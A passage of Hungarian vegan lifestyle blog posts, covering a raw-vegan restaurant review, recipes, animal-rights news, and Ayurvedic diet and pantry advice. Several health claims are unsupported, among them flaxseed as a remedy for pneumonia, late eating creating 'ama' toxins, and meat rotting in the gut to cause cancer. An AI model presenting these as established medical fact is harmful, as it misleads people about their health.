lelkesen. Vendégkörük nagyon vegyes, egészen baba kortól a nagyszülőkig mindenki jár hozzájuk és legfőképpen egészség megőrzés céljából választják a Natúr Ételbárt. A pécsi Natúr Ételbár kínálata Az alapanyagok többségét helyi termelőktől vásárolják, azonban a telet árubeszerzés szempontjából igazi kihívásnak élik meg és túlnyomó részt gyökérzöldségeket használnak az ételek elkészítéséhez. Mikiék nem fix étlappal dolgoznak, hanem heti menüket állítanak össze, mely minden napra tartalmaz 2 fajta zöld turmixot, 1 fajta levest, 2 fajta főételt és 2 fajta desszertet. A menük mellett édességek aránylag nagy választékban lelhetőek fel a hűtőjükben. A heti menüket ők állítják össze odafigyelve arra, hogy a zömében húsevő vendégeik is megtalálják a kedvükre valót, így nagyon jellemző éttermükre a hagyományos ételek nyers vegán változata. “Azt valljuk, hogy az emberek nem hús vagy növényevők. Inkább ízeket keresnek. Mégpedig azokat az ízeket, melyeket megszoktak. Ha azt megtalálták akkor az-az étel szinte mindegy miből készül.” Mi ott jártunkkor töltött káposztát, pizzát, valami brokkolis őrületet, nyers vegán kenyeret magvakból, valamint spenót és mák turmixot választottunk. Nagyon éhesen mentünk be és első körben az adagokat kicsit keveselltem, de a rostdús nyers vegán kaják bizony nagyon laktatóak voltak és a végén tökéletesen elégedett és egészséges telítettség érzéssel távoztam. Árakban közel budapesti szintet hoznak, nem mondható olcsónak de vészesen drágának sem, ár érték arányban a többi nyers vegán étteremhez képest kiválónak tartom a pécsi Natúr Ételbárt. A beszélgetést a következő kérdéssel zártam: Ha a repertoárotokból egy étellel kellene bemutatni a Natúr Ételbárt, melyik lenne az? “A szalámis pizza, melyen a szalámi kizárólag aszalt zöldséget, aszalt gyümölcsöt és magvakat tartalmaz. A gyerekek is imádják.” – ha meglátogatjátok őket, mindenképpen kóstoljátok meg! Nyitvatartás: Hétfőtől szombatig: 11:00 és 19:00 között nyitva Vasárnap: Zárva Pécs területén kiszállítással is foglalkoznak, minden este 20:00-ig várják következő napi rendelésed. Cím: 7620 Pécs, Hunyadi János u 20. A Natúr Ételbár honlapja és a Natúr Ételbár facebook oldala.
Almás-fahéjas Quinoa falatok (gluténmentes, laktózmentes, tojásmentes, vegán)
almás-fahéjas quinoa falatok (glutén-, laktóz-, és tojásmentes, vegán) Veletek is rendszeresen előfordul, hogy túl sok gabonát főztök ki köretnek, és végül nem fogy el? Nem szeretek ételt kidobni, úgyhogy próbálom megtalálni az újrafelhasználás lehetőségeit! Ez a recept is így született! Minden a maradék quinoával kezdődött... majd a téli fűszerekkel folytatódott... és az almával végződött. ;-) A maradék kuszkuszból gyakran készül friss zöldséggel gazdagítva kuszkusz saláta, a kölest tölthetjük cukkini hajókba, a maradék amarántból készíthetünk sajtos tallért, a rizsből pedig sós muffinokat. (Ehhez receptet hozok a későbbiekben a Zöld Avocado vegetáriánus gasztroblogra.) A legutóbbi gombapörkölt mellé túl sok quinoát főztem ki, így 2 az 1-ben módszerrel, a gomba pörkölt mellé készült köretből, egyből lett egy kis délutáni nasi is. :-) almás-fahéjas quinoa falatok (glutén-, laktóz-, és tojásmentes, vegán)Ha egészségesen szeretnénk táplálkozni, fontos szem előtt tartanunk a VÁLTOZATOSSÁGot az alapanyagok felhasználásában. Így biztosíthatjuk, hogy a szükséges tápanyagokhoz, vitaminokhoz, ásványianyagokhoz, nyomelemekhez hozzájut a szervezetünk. A változatosság a köreteket is érinti. A számunkra jól ismert rizs mellett rengeteg, sokkal táplálóbb és értékesebb gabonafélét kínál fel számunkra a természet. Nekünk csak meg kell őket találni, és elfogadni! ;-) Ilyen például a köles, az árpagyöngy, a hajdina, az amaránt és a quinoa is, melyeket gluténérzékenyek is bátran fogyaszthatnak! A bulgur, a kuszkusz glutén tartalma miatt már nem mindenki számára javasolt. tarka quinoa: csontszínű, vörös, fekete "Miért érdemes quinoát enni? - A quinoa az egyik legtöbb ásványi anyagot és tápanyagot tartalmazó, legtáplálóbb gabona, nem hiába tartották az inkák a ,,Magok Anyjának. Rengeteg fontos vitamint tartalmaz: B-vitaminokat (B1, B2, B3), C-, E-vitamint és ß-karotint. (Ez utóbbi három fontos antioxidáns, tehát jelentősen hozzájárul a káros szabad gyökök hatástalanításához, ezért sportolók számára különösen ajánlható, valamint a daganatmegelőző étrendnek is hasznos összetevője is lehet.) Az ásványi anyagok közül különösen gazdagmagnéziumban, kalciumban, vasban, káliumban, illetve foszforban és cinket is tartalmaz. Ezzel a magas ásványi anyag tartalmával jó pár gabonafélét túlszárnyal (búza, árpa, zab, rizs). - Lassan lebomló szénhidrátforrás, sok rosttal. Cukorbetegek, székrekedéssel küzdők, fogyókúrázók, kismamák, idősek számára is javasolható. Méregtelenítő kúrák nagyszerű alkotóeleme lehet. - Minden esszenciális aminosavat tartalmaz. Igen figyelemreméltó a lizin, cisztin és metionin tartalma. Fehérjetartalma 13,3-15,2%. Összehasonlításul a rizs fehérjetartalma 7,4 %, a búzáé pedig 11,7 %. Vegetáriánusoknak, vegánoknak különösen ajánlott, bátran helyettesíthetőek vele az állati fehérjék. - Gluténmentes, ezért lisztérzékenyek is fogyaszthatják. - Lúgosító hatással is bír, e tekintetben a vadrizshez, az amaránthoz és a csíráztatott magvakhoz hasonló. - Zsírtartalma a gabonaféléknél nagyobb, főként telítetlen zsírsavakból tevődik össze." Forrás: antalvali.hu almás-fahéjas quinoa falatok (glutén-, laktóz-, és tojásmentes, vegán) HOZZÁVALÓK (kb. 12 db 5 cm átmérőjű kupachoz) 1/2 bögre quinoa1 bögre tiszta víz2 db közepes alma lereszelve3 ek barna nádcukor (egyéb tetszés szerinti édesítőszer)csipet Himalája só2 ek őrölt fahéj, 1/2 tk őrölt szerecsendió, késhegynyi őrölt szegfűszeg5 ek lenmagliszt vagy mandulaliszt(elhagyható - 2 ek chia mag) almás-fahéjas quinoa falatok (glutén-, laktóz-, és tojásmentes, vegán) ELKÉSZÍTÉSA quinoát megfőzzük kétszeres mennyiségű vízben, fedővel, kb. 20 perc alatt. A megfőtt gabonához hozzáadjuk a fűszereket, a sót, a reszelt almákat, a választott lisztet, és alaposan összekeverjük. Hagyjuk egy fél órát állni a tésztát, majd fagyi adagoló kanállal kis kupacokat helyezünk egy muffin sütőbe (amit előtte vékonyan kikentünk kókuszolajjal). 180 °C fokra előmelegített sütőben kb. 15 perc alatt készre sülnek a fahéjas quinoa falatok. Ha belefér a diétánkba, és kicsit látványosabbá szeretnénk tenni a barnás kupacokat, akkor olvasszunk fel vízgőz felett étcsokoládét és fehér csokoládét, majd mártsuk a quinoa falatok tetejét az olvadt csokikba. Tegyük őket a hűtőbe, hogy jól rádermedjen a csokoládé. De természetesen a csoki nélkül is fogyasztható délutáni nasinak, vagy akár másnap reggelinek. A munkahelyre és az iskolába is könnyedén magunkkal tudjuk vinni ezeket a falatnyi tápláló energiabombákat. almás-fahéjas quinoa falatok (glutén-, laktóz-, és tojásmentes, vegán) Táplálkozz ne csak étkezz a Zöld Avocado receptek segítségével! ;-)
A lenmag hatásai
2016. január 18. Élj harmóniában
Tápláló, erősítőszer, lábadozásnál is javasolt. Kiemelten csontokat erősíti. Gyulladáscsökkentő hatású. A légzőszerveket kedvezően befolyásolja. nyákoldó, hurutoldó - jótékony megfázásnál, asztmánál. köhögésnél. Ájurvéda ajánlja bronchitis és tüdőgyulladás esetén is. Segít megszüntetni a puffadást. Kedvezően hat a vastagbélre. Enyhe székrekedésnél hashajtó hatású - 1-2 evőkanál lenmaggal érdemes főzetet készíteni és elalvás előtt fogyasztani. Erős székrekedésnél nem javasolt használni, mert növelheti a pangást a belekben. Hasmenésnél is jól használható. Külsőleg fekélyek és gyulladt felületek borogatására használható. Ájurvédikus hatása hevítő, csökkenti a vata-t, növeli a pitta-t, kapha-t.
10 állatjogi siker 2015-ből
Az angol Independent közzétette 2015 legfontosabb állatjogi győzelmeit. Nézzük mi az a 10 állatjogi siker, melyet túlszárnyalhatunk 2016-ban.
Első állatjogi siker
Világszerte egyre kevesebb embert érdekelnek a cirkuszi show-k és azok az állatok, melyeket természetes élőhelyükről kiszakítva, pusztán az emberek szórakoztatására tartanak. Teszik mindezt úgy az idomárok és cirkuszt üzemeltetők, hogy sokszor az elégséges körülményeket sem tartják fent az állatok számára. 2015-ben Hollandiában betiltották a vadállatok cirkuszi szerepeltetését, így a tilalmazó országok száma 17-re emelkedett.
Második állatjogi siker
Az elmúlt 300 évben több ezer állatot fejeztek le az öt évente megrendezésre kerülő nepáli Gadhiami fesztiválon, áldozat bemutatás címén. Leginkább “haszonállatok” jártak pórul ezen a rendezvényen. Idén a Gadhiami Temple Trust ígéretet tett, hogy a következő rendezvényüktől kezdve, tehát a 2019-es fesztiválon már nem lesz helye ennek az öldöklésnek.
Harmadik állatjogi siker
Angliában nagy divatja van a hajtóvadászatoknak, többek között a róka hajtóvadászatnak. Több tízezer aláírás és több év erőteljes tiltakozás után sikerült elérni azt, hogy több tucat kutya helyett már csak két kutyával szabad hajtani a kiszolgáltatott állatokat. Ezen hajtóvadászatokon a végkimerülésig hajszolt vadakat vagy a kutyák tépik szét elevenen, vagy fegyverrel végeznek velük. A 2016-os évben azért még lenne ezen mit gyúrni, de semmiképpen nem vagyok elégedetlen.
Negyedik állatjogi siker
Többek között az amerikai PETA egy évtizedes kitartó munkája eredményeként értékelhető, hogy az egyik legnagyobb amerikai vándorcirkusz a Ringling Bros. – mely többek között elefántokat és tigriseket is kényszerít cirkuszi mutatványozásra – bejelentette, hogy 2018-ig bezárólag fokozatosan kivonja az elefántokat a műsoraiból. Kezdetnek bizony nem rossz, utána rögtön jöhetnek az oroszlánok és a tigrisek.
Ötödik állatjogi siker
A gyógyszer- és szépségiparban még mindig elfogadott módszernek számítanak az állatkísérletek. Az amerikai PETA és egyéb állatvédelmi szervezetek munkájának köszönhetően, az Amerikai Egyesült Államokban 2015-ben bejelentették, hogy betiltják a csimpánzokon folytatott kísérleteket. Már el is kezdték kidolgozni a megmenekült állatok rezervátumokba telepítésének ütemtervét. Csodálatos hír, reméljük egyre inkább kiterjesztik más állatfajtákra is ezt a korlátozást.
Hatodik állatjogi siker
A legtöbb Észak-Európai országhoz hasonlóan Dánia is csatlakozott a bestializmust tiltó országok közé. Röviden és tömören összefoglalva az állatokkal történő szexuális erőszakot tiltották be, ezzel a fekete piacra száműzve az “állatszexturizmus”-t. Már csak három európai országban megtűrt ez a szexuális szélsőség.
Hetedik állatjogi siker
Újabb állatkísérletekkel kapcsolatos jó hír. 2015-ben Új-Zélandon teljes mértékben betiltották a kozmetikai célú állatteszteléseket. Az állatvédelmi szervezetek sok éves nyomása és körülbelül 15 ezer aláírás hatására változtatta meg az állatvédelemmel kapcsolatos törvényeit az új-zélandi kormány. Innen már csak egy lépés az állatokon tesztelő cégek teljes piaci kitiltása.
Nyolcadik állatjogi siker
Angliában 2010 óta tiltott a kész háztartási termékek – például samponok, tusfürdők – tesztelése állatokon ugyancsak a PETA-nak köszönhetően. Az állatvédelmi egyesület ígéretéhez híven itt nem áll meg és addig tartja nyomás alatt az angol törvényhozást amíg nem tiltja be a háztartási szerek összes összetevőinek tesztelését az állatokon.
Kilencedik állatjogi siker
Mumbaiban nagy divatja volt a lovaskocsizásnak. Egészen 2015-ig. Számos bizonyítékot szerzett a PETA, hogy nagyon sok esetben a vállalkozók nem biztosították az állatnak a szükséges vizet, takarmányt, valamint a minimális orvosi ellátást sem. Ezen bizonyítékok hatására 2015-ben az indiai kormány betiltotta a közel 12 milliós Mumbaiban a lovaskocsizást.
Tizedik állatjogi siker
A Kaliforniai Parti Bizottság – California Coastal Commission – egy feltétellel hagyta jóvá a SeaWorld, több millió dolláros Blue World Projectjét. Mégpedig, hogy azonnali hatállyal felfüggesztik az kardszárnyú delfinek fogságban történő szaporítását. Ez a döntés azt jelenti, hogy jó eséllyel a most fogságban úszkáló kardszárnyú delfinek lesznek az utolsó rabságban nevelkedő ilyen állatok.
Ezek a sikerek évről évre gyarapodnak, ahogy egyre több ember tiltakozik az állatok kihasználása ellen. Emellett egyre többen lesznek etikai megfontolásból vegánok, mely arány egyre inkább mutatja meg a hezitáló többségnek, hogy bizony lehet a kiszolgáltatottakat nem kihasználva, hanem védelmezve élni, a “nem ártás” életvitelét gyakorolva. Többek között ebből a megfontolásból lettem én is vegán.
Forrás: independent.co.uk
Földimogyoróvajas-csokoládés zabkeksz (vegán)
2016. január 13. Zizi kalandjai
Ezeket a kekszeket az elmúlt egy hétben kétszer is megsütöttem. Most, hogy ugye újra szoptatok és nem ehetek magas fehérje tartalmú hüvelyeseket, így maradnak a magok, magvajak, amikkel növelni tudom a fehérje bevitelemet, na és ott van az ebben a kekszben szereplő zabpehely is, ami ráadásul tejserkentő. Erre mondják, hogy win-win kategória. Na persze éhes is vagyok rendesen, hiába eszem nagy adagokat. Szóval az ilyen édes, kényeztető nasik – mint ez a keksz – adják a nap egyik fénypontját.
Most vastagabb kekszeket készítettem, mint szoktam és nagyon figyeltem a sütési időre is (előfordul, hogy megégetem a kekszeket, pláne, ha vékonyabbra formázom őket), így finom és inkább puha, mint nagyon ropogós kekszeket kaptam. Nekem nagyon bejön ez az állag, szerintem nehezebb is abbahagyni az evését… nemcsak a puhasága miatt, hanem a finomsága miatt is. Földimogyoróvaj, vanília, zabpehely, csoki cseppek… nyerő négyest alkotnak! Próbáljátok ki Ti is!
Földimogyoróvajas-csokoládés zabkeksz (vegán)
Hozzávalók:
– 1 bögre és 2 evőkanál sima földimogyoróvaj (házilag is elkészíthetjük)
– 1 bögre zabpehely
– 1 bögre tönköly fehérliszt
– 1 bögre nyers nádcukor vagy kókuszvirág cukor
– 1/4 bögre zabtej, plusz 1-2 evőkanál (bármilyen más növényi tej használható)
– 2 evőkanál lenmagpehely (darált lenmag)
– 6 evőkanál víz
– 1/3 bögre étcsokoládé cseppek (bármilyen csokoládé jó felaprítva is, de el is hagyható)
– 1 vaníliarúd kikapart magjai
– csipet só
Egy kis tálkában keverjük össze a lenmagpelyhet a vízzel és tegyük félre néhány percre. Melegítsük elő a sütőt 180C fokra. Egy tepsit béleljünk ki sütőpapírral.
Közben egy tálban keverjük össze a földimogyoróvajat a nádcukorral, a vaníliával, a sóval, majd adjuk hozzá a zabpelyhet és a lisztet. Öntsük hozzá a zabtejet és a zselés állagú vizes lenmagpelyhet. Nem áll a tészta teljesen össze, de ha egy kis adagot az ujjunkkal összenyomunk, akkor össze kell ragadnia. Ha van még nagyon száraz rész a tésztában, akkor adjunk hozzá egy evőkanál zabtejet.
Fagyis kanálba nyomkodjuk bele a tésztát és adagoljunk gombócokat a sütőpapírra (ha nincs fagyis kanál, akkor kézzel lehet kis gombócokat formálni). Majd ezeket a tenyerünkkel lapítsuk le kicsit. Az előmelegített sütőben süssük kb. 15 percig, amíg aranybarnák lesznek.
Az egészséges és tudatos táplálkozás alapjai 5. - Étkezések időzítése
2016. január 11. Élj harmóniában
Az egészséges és tudatos táplálkozás alapjai cikksorozatban, már írtam arról, hogyan figyelhetsz a tested jelzéseire, miként különböztesd meg az egészséges ételeket, a kedvezőtlen ételektől, arról mivel töltsd fel a kamrád, ha egészségesen szeretnél táplálkozni és a fűszerezésről is. Most az étkezések időzítéséről szeretnék néhány hasznos tanácsot megosztani veletek. Ahogy a természetnek van egy ritmusa, úgy az embereknek is van egy természetes ritmusuk. Szervezetünk működését (idegrendszer, hormonrendszer, emésztőrendszer, etc.) 24 órás ciklusra bonthatjuk - illetve bizonyos funkciók havi ciklusban működnek. Ahogy a természetben is fontos az időzítés, úgy a szervezet számára is meghatározó. Bizonyos időszakok egy-egy tevékenység elvégzésére alkalmasak, míg más időszakok nem igazán megfelelőek. Ha mindent a maga idejében, összhangban a természetes ritmusunkkal teszünk, akkor eredményesek leszünk és energiáinkat jól használjuk fel. Amennyiben nem a természetes ritmusunknak megfelelően élünk, akkor kimerítjük a szervezetünket. A cél mindig törekedni a harmónia elérésére, harmóniában lenni Önmagaddal, a természettel, és a környezeteddel. Nem csak a napszakok figyelembevétele fontos, hanem az évszakok figyelembevétele is kiemelkedő szerepet kap. pl. nem célszerű télen nagyobb mennyiségben nyers salátákat, nyers gyümölcsöket fogyasztani. Ha elmulasztjuk figyelembe venni az évszakokat és a napszakokat, akkor az pszichés zavarokhoz, álmatlansághoz, betegségekhez, rossz közérzethez vezethet. Ebben a cikkben nem térek ki a teljes ciklikusságra, most csak az étkezések megfelelő időzítéséről szeretnék írni. Időzítsd megfelelően az étkezéseket. Próbálj rendszeresen, azonos időpontban enni. Ha rendszert viszel az életedbe, azzal segíted a tested természetes folyamatait. Amikor azonos időkben étkezel, akkor támogatod az emésztésed természetes ciklusát. Ha az étkezések jól időzítettek, garantált az is, hogy egyik étkezésről a másikig, pont jól meg is fogsz éhezni:) Reggel éhgyomorra fogyaszthatsz pl. citromos forralt vizet - ez segít a szervezet tisztulásában is. A reggeli legyen könnyű - a legtöbb ember emésztőrendszer még nem indul be reggel és nem szerencsés megterhelni. Jobb ha reggelire nem fogyasztasz tojást, felvágottat, húsos ételeket. Részesítsd előnyben a gyümölcsöket, magvakat, meleg gabonaételeket. (Ájurvédikus testtípus szerint: vata típusok kiadósabb, meleg ételt egyenek, pitta típusok mindenképpen rendesen fogyasszanak reggelit, ők a gyümölcsöket, magvakat, joghurtot is jól emésztik reggelire és kapha típusok számára nagyon könnyű reggelire van szükség) Az ebéd legyen a nap legkiadósabb étkezése, mert az emésztés tüze, ilyenkor a legerősebb (11 és 14 óra között, de legjobb ha 12:00 és 13:00 között fogyasztod el az ebéded.). Mivel ilyenkor az emésztés tüze nagyon aktívan működik, ilyenkor tudsz kicsit nagyobb adagot enni és akár nehezebben emészthető ételeket is pl. sajt, tojás, hús, túró. Próbálj az ebédnél is a testet energiával feltöltő ételeket választani és vedd figyelembe a hat alapíz változatos használatát. A vacsorát lehetőleg 18-19 óráig fogyaszd el. A vacsorád legyen könnyű - e stére mellőzd az olajban kisült dolgokat, az állati fehérjéket - hús, sajt, joghurt, túró, tojás. Tejet fogyaszthatsz magában vagy édesen gabonával pl. tejbegríz. Ha nem is tudsz megvacsorázni este 19:00-ig, akkor tartsd szem előtt minél később eszel, annál könnyebbet egyél. A lefekvés és az étkezés között mindenképpen teljes el idő - ne feküdj le teli gyomorral, hagyd hogy az étel megemésztődjön. 22:00 után már ne egyél, a legjobb ha 22:00-ig lefekszel aludni. A szervezet számára ez a pihenés, regenerálódás ideje. Sajnos a 22:00 után elfogyasztott étel, méreganyagokat (ama-t) hoz éltre a szervezetben. Ha este tíz után bevacsorázol, akkor reggel fáradtan, tompán fogsz ébredni és az alvással nem energiát termelsz, hanem lecsökkented az energiaszinted. Testtípus függvényében beiktathatsz esetleg egy tízórait és egy délutáni kis étkezést, pl.gyümölcsöt lehet enni étkezések között vagy lassit (joghurtitalt) de az étkezések között ne egyél, ne nassolj. Amikor ráeszel a még meg nem emésztett ételre, sajnos nagyon sok "ama"- azaz salakanyag keletkezik. Mindig várd meg, hogy az előző ételt megeméssze a szervezeted és, akkor egyél ha éhes vagy. Ha egy étkezésnél nem érzed magad éhesnek, mert még pl. az ebéd eltelít, akkor a vacsorát nyugodtan ki is hagyhatod. Az évszakok szempontjából is van néhány tanács, amit jó ha figyelembe veszel. Télen részesítsd előnyben a tartalmasabb, nehezebben emészthető, szaftos, zsírosabb, tápláló ételeket. Mindenképpen meleg ételeket egyél. és jók az édes, savanyú és sós ízek. Tavasszal kerüld el az édes, sós, zsíros ételeket és egyél könnyebben emészthető, kicsit szárazabb, meleg ételeket. Jó ha kerülöd a savanyított tejtermékeket, hús és tojásféléket is. Nyáron jöhetnek nyers zöldségek, gyümölcsök vagy akár párolva. Kerüld el a csípős, sós, savanyú ízeket.Nyáron fogyaszthatsz hűvösebb italokat és ételeket is. Ősszel mindenképpen meleg ételeket, italokat fogyassz. Tápláló, zsíros, tartalmas ételeket egyél. Arról, hogyan egyél, milyen körülmények között a következő bejegyzésben írok majd részletesen.
Az egészséges és tudatos táplálkozás alapjai 3. - Mi kerüljön a konyhaszekrénybe
2016. január 9. Élj harmóniában
Az egészséges és tudatos táplálkozás alapjai előző részében részletesen írtam arról, mely ételek töltik fel a tested energiával és mely ételek azok, amelyek energiát vonnak el, fáradttá , tompává tesznek. (itt olvashatod) A fő elv, hogy friss, teljes értékű, tiszta minőségű (bio), egyszerű, természetes ételeket részesítsd előnyben. Ahhoz, hogy elkezdj egészségesen táplálkozni, vedd szemügyre a konyhaszekrényt és a kamrát. Próbálj megszabadulni az előző cikkben említett kerülendő ételektől, lejárt alapanyagoktól, tartósítószerezett, vegyszeres konzervektől, félkész ételektől, édességektől. Mivel töltsd fel az éléskamrád? Vegyük sorra milyen élelmiszereket érdemes otthonra beszerezned ahhoz, hogy egészségegesen, változatosan és teljes értékűen tudj étkezni. Elsődlegesen vegyszermentes (bio) változatokat vásárolj. Nem kell mindent azonnal beszerezni, szépen lassan fokozatosan kezdj el kipróbálni új dolgokat, ismerkedni az új alapanyagok felhasználásával. A bio élelmiszerek ára néhány esetben több mint a konvencionális élelmiszereké - nem mindig drágábbak - ezért ha ugyanazokat szeretnéd beszerezni amit előtte, akkor az lehet, hogy sokkal drágább lesz és nem sokkal lesz egészségesebb sem. Írd össze 1 hónapban összesen mennyi pénzt költesz élelmiszerre - legyen benne minden, a céges automatából a kis csoki, a moziban az üdítő, etc. Szinte teljesen biztos, hogy abból az összegből lehet 30 napig bio-t enni, legfeljebb kicsit más menüket főzöl majd, de hidd el megéri a befektetett energiát, pénzt - hiszen ha jó a közérzeted, nem kell orvoshoz menned, és mindig tele vagy energiával, akkor nem kell gyógyszerekre sem költened és élénkítőszerekre sem, ráadásul a munkádat is hatékonyabban és jobb kedvvel tudod végezni:) Íme egy olyan lista, amit én jó szívvel ajánlok, szerintem a lenti élelmiszerek jó ha mindig vannak otthon. A lenti lista csak egy segítség, ennek fényében alakítsd ki a saját kamrádat. Ne halmozz fel túl nagy készleteket, a legjobb ha minél frissebb amit fogyasztasz. Amiket vásároltál, felbontás után tárold légmentesen záródó üvegben és mindig vedd fegyelembe a szavatossági időket. Ne egyél lejárt, rossz szagú, penészes élelmiszereket. Gabonafélék fehér és barna baszmati rizs hajdina köles búzadara árpa bulgur kuszkusz amarant quinoa kukoricadara tészta zabpehely (esetleg más pelyhek) finom és teljes kiőrlésű lisztek (búza, tönkölybúza, rozs, zab) rizsliszt kukoricaliszt A gabonák elkészítésének eltérő módjai vannak és a főzési idejük is eltérő. Szerezz ismereteket a pontos főzési időkről. Egy későbbi bejegyzésben, majd részletesen írok róla itt a blogon is. Hüvelyesek csicseriborsó csicseriborsóliszt mungbab barna és vörös lencse sárgaborsó kidney bab fekete bab fehér bab Csicseriborsó konzerv Kidney bab konzerv Minden hüvelyesnek más az áztatási és a főzési ideje - pl a mungobabaot, vöröslencsét nem is kell áztatni. Mielőtt elkezded a fenti hüvelyeseket használni, nézz utána melyiket mennyi ideig érdemes főzni. Egy későbbi bejegyzésben, majd részletesen írok róla itt a blogon is. Magvak, Diófélék mandula szezámmag lenmag napraforgómag kókuszreszelék dió mogyoró tökmag A magvak könnyen avasodnak, ezért ezekből semmiképpen ne tárolj túl nagy készletet. Felhasználás előtt pirítsd meg a magvakat, dióféléket, mert így könnyebben emészthetőek és ízletesebbek is. Édesítők, ízesítők és sütési hozzávalók teljes értékű (barna) nádcukor méz lekvárok datolyacukor datolyaszirup mazsola datolya egyéb aszalt gyümölcsök sütőpor szódabikarbóna vanília friss citrom bio pudingpor, kukoricakeményítő karob vagy kakaó kókusztej almapüré paradicsomkonzerv olajbogyó Zsírok, olajok ghí olívaolaj kókuszzsír repceolaj szezámolaj napraforgóolaj A főzésre legalkalmasabb a ghí vagy a kókuszzsír. Fűszerek, gyógynövények bányászott só kurkuma feketebors római kömény édeskömény assafoetida koriander karmamom chili fahéj szegfűszeg garam masala bazsalikom kakukkfű oregano rozmaring gyömbér Ezt a listát ízlésed, kedved szerint alakítsd:) A fűszereknek se vége, se száma, a fentiek szerintem alapszükséglet egy konyhában. A következő bejegyzésben részletesen írok majd a fűszerek használatáról is. Mi a szerepük a táplálkozásban, miért annyira fontosak és hogyan használd fel őket. Használj friss fűszereket is, gyömbér, petrezselyem, koriander, menta, bazsalikom, etc. Zöldsége, Gyümölcsök friss bio zöldségek (csak néhány példa: cukkini, brokkoli, répa, cékla, karfiol, paprika, spenót, padlizsán, uborka, karalábé, édeskömény, sütőtök) friss bio gyümölcsök ( csak néhány példa: alma, körte, eper, cseresznye, szilva, banán, datolya, szőlő, füge, áfonya, narancs, citrom, sárgabarack, őszibarack) Évszaknak megfelelő, lehetőleg a közelben termelt vegyszermentes zöldségeket, gyümölcsöket vásárolj. Az ilyen zöldségek, gyümölcsök vitamin, ásványi anyag és nyomelem tartalma sokkal magasabb és nem tartalmaznak a szervezeted számára káros anyagokat. Használd változatosan a zöldségeket és készítsd el különböző elkészítési módokon, különböző fűszerezéssel. Sok receptet találsz a blogon, de a későbbiekben részletesebben is írok a zöldségek, gyümölcsök elkészítéséről. Tejtermékek nem homogenizált, friss tehén tej vaj joghurt friss sajtok Ha nem is tervezel vegetáriánus lenni, iktass be az étrendedbe húsmentes étkezéseket, húsmentes napokat. figyeld meg a hatásokat - adott napon hogyan érezted magad - magasabb volt az energiaszinted vagy nem, nyugodtabb voltál vagy sem.. Próbáld tudatosítani a tapasztalataidat. Ha lehet a vörös húsokat hagyd el teljesen és inkább fogyassz szárnyasokat és halat. Utóbbiakat is vegyszermentes gazdálkodásból - lévén a nagyüzemi húsok nagyon sok hormont és antibiotikumot látnak. Kerüld el a tojás használatát is - későbbi bejegyzésben a tojáspótlókról részletesen írok. Amikor elkezded az egészséges étkezést, változatos, természetes ételeket fogyasztasz tapasztalni fogod, ez milyen izgalmas, sokszínű, ízletes. Figyeld meg magadon is a változást - az emésztésed, alvásod, bőröd, hajad állapotát, egészségi állapotodat, az elméd békéjét, érzékszerveid állapotát (szaglás, ízlelés, hallás).
Chili lekvár
Ha szereted az édes csípős ízeket, akkor ez a házilag is könnyedén elkészíthető chili lekvár igazi kedvenceddé válhat. Chili és lekvár? “Hogy jön ez össze?” – teheted fel a kérdést. A kínai éttermekben találkozhattál hasonló édes csípős édes savanyú ízekkel. Az alapvető különbség, hogy azok sima mártások, de ezt valóban hívhatod lekvárnak, mivel főzni kell. Nézzük, hogyan készül a chili lekvár. Chili lekvár összetevők 5db chili paprika 25dkg kápia paprika 25dkg piros kaliforniai paprika 3 gerezd fokhagyma (szerintem elbír többet is) 4-5cm-es gyömbér 25 dkg kókuszvirág cukor (bármilyen más cukorféle is megteszi) 1dl almaecet 1 csipet só fél csomag stabark növényi zselésítő (bármilyen más növényi zselésítő is jó lesz) Chili lekvár elkészítése A kápia és kalifornia paprikákat főzd puhára körülbelül 30 perc alatt, majd vedd ki a vízből, hogy ne ázzon ki belőlük az ízük és hagyd kihűlni őket. Miután kihűltek a paprikák, vágd ki a magházat és hámozd meg a zöldségeket. Ezután hámozd meg a paradicsomokat és vágd őket apró szeletekre úgy, hogy megmaradjon a levük is. A hámozott, főtt paprikákat és a felvágott paradicsomot tedd egy főzőedénybe, majd add hozzá az almaecetet, a kókuszvirág cukrot, passzírozd bele a fokhagymákat, reszeld bele a gyömbért, valamint szórd bele a sót. Hozzávetőleg negyed órát főzd, majd annyi ideig turmixold, amíg püré állagú nem lesz. Végül add hozzá a fél csomag növényi zselésítőt, majd forrald az egészet 1-2 percig. A főzés részével készen is vagy. Amikor elkészül a chili lekvár öntsd bele kifőzött, sterilizált üvegekbe, majd száraz dunsztban hűtsd le a már elkészült chili lekvárt. Mivel édeskés és egyben csípős is ez a finomság, így sós és édes ételekhez is szívesen fogyasztom és neked is szívesen ajánlom lényegében bármihez – na jó, babfőzelékhez és karalábé leveshez nem –, bármilyen napszakban akár reggelihez, uzsonnához, ebédhez vagy vacsorához, de legfőképpen előételként. Egészségedre!
A vegán fehérjepor előnyei és fajtái
Számos féle-fajta vegán fehérjepor található a boltokban. De melyik a jobb, és ha jobb miért jobb? Egyáltalán szüksége van a szervezetnek bármilyen fehérjeporra?
A következő vegán fehérjepor termékek kaphatóak a magyar piacon:
AbsoRice vegán fehérjeporok – csokoládé, kapuccsínó, vanília, eper, kakaókrém ízesítésben
Barna rizs fehérje (Naturize)
Chia mag fehérjepor (Dragon Superfood)
Kendermag Protein (Green Origins)
Protein Smoothie (Meal Balance)
RAW protein (Garden of life) – vanília, csokoládé, natúr
Rizs fehérje (BioTech) – erdei gyümölcs, csokoládé-fahéj ízesítésben
Szójafehérje izolátum (Dénes-Natura)
Vegan Protein (Triplex) – áfonya, vanília, csokoládé ízesítésben
Vegán Protein (Vegabond) – vaníliás, csokis, chai ízesítésben
Vegan Protein Fusion (Peak) – natúr, csokoládé ízesítésben
(A nevekre kattintva tudjátok megnézni a termékjellemzőket.)
Azonban mielőtt vásárlásba kezdtek engedjétek meg, hogy a vegán fehérjepor témájával kapcsolatban feltegyek és megválaszoljak pár kérdést.
Miért vegán fehérjepor?
Az állati fehérjék emésztése nem megy könnyedén a szervezet számára. Mivel teljesen rostmentes mindennemű állati táplálék, így az nehezíti és lassítja az emésztést, ráadásul a fel nem használt tápanyag gyors rothadásnak indul a belekben, mely folyamat olyan toxinokat szabadít fel, melyet összekötnek többek között a vastagbélrák kialakulásával. Ami még problémát jelent, hogy minél nagyobb mennyiségben vesz magához az ember rostmentes állati eredetű táplálékot, annál lassabbá válik az emésztés és annál hosszabb ideig szívódnak fel a rothasztó baktériumok által termelt toxinok. Ezt a helyzetet tovább súlyosbítja a mozgáshiány és az ülőmunka is. Az emberi bélrendszer hosszúsága sem a gyors fehérje emésztést támogatja, de erről bővebben a húsevő az ember című cikkemben írok.
A tejmentes vegán fehérjepor előnye
